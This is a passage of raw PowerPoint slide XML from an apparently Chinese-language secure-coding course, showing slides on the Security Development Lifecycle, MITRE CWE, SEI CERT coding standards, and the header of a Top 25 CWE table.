            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="Shape 246"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289637" y="6180801"/>
            <a:ext cx="1008112" cy="307777"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Requirements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Shape 247"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1423862" y="5979083"/>
            <a:ext cx="1666948" cy="645839"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Shape 248"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1892869" y="6153871"/>
            <a:ext cx="1023241" cy="307777"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Design</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="249" name="Shape 249"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3171202" y="6010803"/>
            <a:ext cx="2708773" cy="645839"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250" name="Shape 250"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3926039" y="6171167"/>
            <a:ext cx="1023241" cy="307777"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Implementation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="251" name="Shape 251"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5912869" y="6010803"/>
            <a:ext cx="3288152" cy="645839"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="252" name="Shape 252"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7678946" y="6192828"/>
            <a:ext cx="1023241" cy="307777"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Verification</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="253" name="Shape 253"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9245402" y="6002135"/>
            <a:ext cx="1269369" cy="645839"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="254" name="Shape 254"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9400161" y="6175578"/>
            <a:ext cx="1008112" cy="307777"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Release</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="Shape 255"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10559149" y="5994521"/>
            <a:ext cx="1399152" cy="645839"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="lt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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Shape 256"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10569635" y="6194687"/>
            <a:ext cx="1497980" cy="307777"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Support &amp; Servicing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Shape 257"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919535" y="-27383"/>
            <a:ext cx="10068983" cy="827088"/>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1" lang="zh-TW" sz="4000" u="none">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>Security Development Lifecycle (SDL)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="258" name="Shape 258"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10578253" y="4453992"/>
            <a:ext cx="1380049" cy="738664"/>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lang="zh-TW" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Cabin"/>
                <a:ea typeface="Cabin"/>
                <a:cs typeface="Cabin"/>
                <a:sym typeface="Cabin"/>
              </a:rPr>
              <a:t>Products Supports Services packs/QFEs Security Updates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="259" name="Shape 259"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2207567" y="1311150"/>
            <a:ext cx="8014951" cy="461664"/>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1" lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Security Development Lifecycle Tasks and Processes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="260" name="Shape 260"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991543" y="3696760"/>
            <a:ext cx="8353825" cy="461664"/>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1" lang="zh-TW" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Traditional Development Lifecycle Tasks and Processes</a:t>
            </a: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64" name="Shape 264"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Shape 265"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367433" cy="4611686"/>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MITRE CWE (Common Weakness Enumeration)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>https://cwe.mitre.org/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300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SEI CERT Code standard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>https://www.securecoding.cert.org/confluence/display/seccode/SEI+CERT+Coding+Standards</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="266" name="Shape 266"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919535" y="185604"/>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安全設計與程式開發的最佳實務(Best Practices)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="267" name="Shape 267"/>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72" name="Shape 272"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Shape 273"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367433" cy="4611686"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="just">
              <a:spcBef>
                <a:spcPts val="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可做為一種描述軟體架構、設計與程式碼之軟體安全漏洞的共通語言(Common Language)。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="just">
              <a:spcBef>
                <a:spcPts val="300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可做為軟體安全工具的標準量尺(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>standard measuring stick</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>)，以檢視可能的軟體漏洞與威脅。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="just">
              <a:spcBef>
                <a:spcPts val="300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可做為弱點辨識、減輕與預防的共通基準(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>common baseline standard</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="0" lang="zh-TW" sz="2800" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:sym typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>)。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="just">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="just">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="1800" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="just">
              <a:spcBef>
                <a:spcPts val="56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CWE目前列舉各種已知可能的架構與設計上的弱點以及程式碼上的錯誤。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Shape 274"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123016" y="177310"/>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MITRE CWE </a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" i="0" lang="zh-TW" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" i="0" lang="zh-TW" sz="4000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>(Common Weakness Enumeration)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Shape 275"/>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7" name="Shape 87"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Shape 88"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Shape 89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Shape 90"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://sec.openedu.tw/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91" name="Shape 91"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1112525" y="2439575"/>
            <a:ext cx="9209724" cy="3536424"/>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80" name="Shape 280"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="281" name="Shape 281"/>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25個常見的CWE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Shape 282"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="283" name="Shape 283"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1487487" y="1412775"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{F200D64E-4686-456C-BBD7-8986DA33EC83}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="936100"/>
                <a:gridCol w="792100"/>
                <a:gridCol w="1296150"/>
                <a:gridCol w="6840750"/>
              </a:tblGrid>
              <a:tr h="116675">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Rank</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>Score</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:buSzPct val="25000"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="zh-TW" sz="1800" u="none" cap="none" strike="noStrike">
                          <a:latin typeface="Verdana"/>
                          <a:ea typeface="Verdana"/>
                          <a:cs typeface="Verdana"/>
                          <a:sym typeface="Verdana"/>
                        </a:rPr>
                        <a:t>ID</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="3075" marB="3075" marR="3075" marL="307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ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
